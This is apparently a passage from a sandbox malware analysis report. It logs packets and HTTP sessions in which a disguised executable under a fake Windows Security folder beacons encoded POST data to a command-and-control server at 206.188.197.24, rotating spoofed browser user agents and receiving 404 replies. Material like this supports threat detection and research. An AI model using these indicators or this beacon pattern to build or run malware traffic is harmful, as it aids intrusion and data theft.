Jan 3, 2025 21:13:11.784159899 CET	49838	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:11.788904905 CET	80	49838	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:12.133048058 CET	49838	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:12.138008118 CET	80	49838	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:12.473135948 CET	80	49838	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:12.523236036 CET	49838	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:12.749938011 CET	49838	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:18.613193035 CET	49879	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:18.618391991 CET	80	49879	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:18.620160103 CET	49879	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:18.620438099 CET	49879	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:18.625540972 CET	80	49879	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:18.976638079 CET	49879	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:18.981461048 CET	80	49879	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:19.236278057 CET	80	49879	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:19.288902044 CET	49879	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:20.224661112 CET	49879	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:30.299113989 CET	49949	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:30.303896904 CET	80	49949	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:30.303975105 CET	49949	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:30.304214954 CET	49949	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:30.308945894 CET	80	49949	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:30.648742914 CET	49949	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:30.653917074 CET	80	49949	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:30.954024076 CET	80	49949	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:31.007663965 CET	49949	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:31.175741911 CET	49949	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:36.952696085 CET	49990	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:36.957494974 CET	80	49990	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:36.957597971 CET	49990	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:36.957830906 CET	49990	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:36.962579012 CET	80	49990	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:37.304934025 CET	49990	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:37.309762001 CET	80	49990	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:37.678580999 CET	80	49990	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:37.726443052 CET	49990	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:37.972748995 CET	49990	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:48.120721102 CET	50013	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:48.125546932 CET	80	50013	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:48.125618935 CET	50013	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:48.125876904 CET	50013	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:48.130587101 CET	80	50013	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:48.476969004 CET	50013	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:48.481828928 CET	80	50013	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:48.777456999 CET	80	50013	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:48.820247889 CET	50013	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:49.012006998 CET	50013	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:58.908102036 CET	50014	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:58.913094997 CET	80	50014	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:58.914385080 CET	50014	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:58.914627075 CET	50014	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:58.919413090 CET	80	50014	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:59.273648977 CET	50014	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:59.278532982 CET	80	50014	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:59.544287920 CET	80	50014	206.188.197.24	192.168.2.4
Jan 3, 2025 21:13:59.585902929 CET	50014	80	192.168.2.4	206.188.197.24
Jan 3, 2025 21:13:59.633560896 CET	50014	80	192.168.2.4	206.188.197.24

HTTP Request Dependency Graph

206.188.197.24

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	206.188.197.24	80	7676	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 21:12:03.943011045 CET	408	OUT	POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: 206.188.197.24 Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 21:12:04.289570093 CET	336	OUT	Data Raw: 00 03 04 04 06 0b 01 03 05 06 02 01 02 05 01 07 00 01 05 0e 02 0d 03 0c 01 0f 0a 05 07 01 00 07 0d 53 04 0d 07 0c 04 0a 0b 05 06 00 06 06 07 54 07 03 0e 5c 0a 02 06 56 01 07 07 04 04 52 04 0a 01 03 0c 0d 05 52 04 54 0e 57 0b 04 0a 00 0d 04 05 03 Data Ascii: ST\VRRTWRSV\L}Uc~OtaaLbv`Oko}`RoX\|hxR]xczhS\|cg{]}e~V@xSn~uy
Jan 3, 2025 21:12:04.609833956 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 20:12:04 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	206.188.197.24	80	7992	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 21:12:14.904330015 CET	391	OUT	POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 206.188.197.24 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 21:12:15.257678986 CET	344	OUT	Data Raw: 00 05 01 00 06 08 04 07 05 06 02 01 02 03 01 06 00 07 05 00 02 05 03 01 07 05 0a 01 04 05 02 02 0f 05 06 5a 02 51 03 0a 0e 54 07 51 04 07 05 52 04 51 0f 0c 0d 07 07 07 06 07 06 51 07 03 00 0f 00 05 0d 0d 07 0f 01 00 0b 04 0b 0e 0c 06 0d 06 02 03 Data Ascii: ZQTQRQQP\L~~`__tbyBwfoR~\|i`UthMsX{\|d[lcjSxtgZNie~V@{mf}b[
Jan 3, 2025 21:12:15.607286930 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 20:12:15 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	206.188.197.24	80	4960	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 21:12:25.626149893 CET	355	OUT	POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 206.188.197.24 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 21:12:25.976442099 CET	344	OUT	Data Raw: 00 0a 01 07 03 0b 04 01 05 06 02 01 02 03 01 01 00 02 05 0e 02 00 03 0b 02 0e 0a 07 06 03 06 04 0f 04 07 0f 03 07 06 0b 0c 56 07 06 07 57 07 52 06 0b 0d 01 0c 02 05 06 07 04 05 06 01 03 05 5d 05 03 0e 01 00 03 05 07 0c 04 0c 0f 0a 02 0f 05 06 0d Data Ascii: VWR]W[U\L~Nh^y^tL_b\pO\|l}to\|O\|`hIxRQzs~}}kScdh~e~V@xSr~r}
Jan 3, 2025 21:12:26.260019064 CET	326	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 20:12:26 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	206.188.197.24	80	2188	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 21:12:32.477483034 CET	390	OUT	POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 206.188.197.24 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 21:12:32.835758924 CET	344	OUT	Data Raw: 00 04 04 02 03 08 01 0b 05 06 02 01 02 06 01 0a 00 01 05 0b 02 0d 03 00 07 03 0d 54 06 02 01 07 0a 02 06 00 07 06 06 01 0c 0a 05 06 07 57 06 04 07 04 0e 0b 0e 01 04 07 07 0e 06 0d 05 00 06 0a 00 05 0f 0e 04 0f 06 52 0c 53 0b 02 0d 56 0f 07 07 50 Data Ascii: TWRSVPUR\L}U~s}^`[uMu[phbYvk\h]wZxBQo^jm`NwIp~O~V@Bzm~LbW
Jan 3, 2025 21:12:33.122116089 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 20:12:33 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	206.188.197.24	80	7508	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 21:12:43.261499882 CET	391	OUT	POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 206.188.197.24 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 21:12:43.617288113 CET	344	OUT	Data Raw: 05 01 04 06 06 0c 04 02 05 06 02 01 02 00 01 07 00 0b 05 0d 02 07 03 08 07 02 0d 06 03 01 00 04 0d 56 04 5b 00 57 07 04 0b 0a 07 03 04 06 04 01 06 53 0e 59 0a 0e 04 0a 04 0e 03 01 06 02 06 0a 02 03 0d 0b 05 53 06 56 0e 00 0c 03 0f 02 0f 51 02 07 Data Ascii: V[WSYSVQPQV\L~Ckcvtb\Xv[oT\|Bz_tlhOMZoooHxYbI\|Cpcgtj_~V@{}P}Lq
Jan 3, 2025 21:12:43.867306948 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 20:12:43 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	206.188.197.24	80	7716	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 21:12:53.996736050 CET	408	OUT	POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 206.188.197.24 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 21:12:54.354630947 CET	344	OUT	Data Raw: 00 03 01 07 03 0a 01 03 05 06 02 01 02 02 01 07 00 04 05 08 02 05 03 0f 02 01 0d 00 04 00 02 07 0c 07 04 5c 01 0c 04 51 0b 05 05 01 05 0b 05 56 03 00 0c 0d 0a 07 07 06 01 03 04 02 05 02 06 0e 00 05 0a 0a 07 01 04 06 0b 02 0b 01 0a 01 0e 07 05 54 Data Ascii: \QVTRP\L~kYyZtrP^wu]P\|[co`hMtIx`_le^h}RtIhNu~V@{}TA}bS
Jan 3, 2025 21:12:54.677918911 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 20:12:54 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49799	206.188.197.24	80	7860	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 21:13:04.796942949 CET	390	OUT	POST /Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 206.188.197.24 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 21:13:05.148442984 CET	344	OUT	Data Raw: 00 04 01 07 06 0c 04 07 05 06 02 01 02 04 01 02 00 0a 05 01 02 0d 03 0b 02 54 0d 56 03 03 00 01 0c 01 04 0c 00 04 04 07 0c 0b 04 03 05 01 06 0f 07 07 0f 59 0a 04 04 07 04 00 07 07 04 52 00 0a 02 57 0c 0c 07 53 06 08 0c 57 0f 0e 0d 01 0d 09 04 0d Data Ascii: TVYRWSWU\L}Tksjcb\Yu\wS\|\|WBtU`BhhJ{{K{pvh}x`Yk[~_~V@@xm\b}
Jan 3, 2025 21:13:05.468766928 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 (Ubuntu) Date: Fri, 03 Jan 2025 20:13:05 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49838	206.188.197.24	80	8068	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Timestamp	Bytes transferred	Direction	Data
